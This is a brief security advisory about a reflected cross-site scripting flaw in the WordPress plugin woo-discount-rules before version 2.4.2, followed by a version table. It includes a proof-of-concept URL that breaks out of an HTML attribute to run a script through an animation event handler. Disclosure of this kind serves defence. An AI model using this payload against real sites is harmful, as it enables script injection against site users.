The plugin does not escape a parameter before outputting it back in an attribute of the plugin’s discount rule page, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=woo_discount_rules&name;="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
CPE | Name | Operator | Version |
---|---|---|---|
woo-discount-rules | lt | 2.4.2 |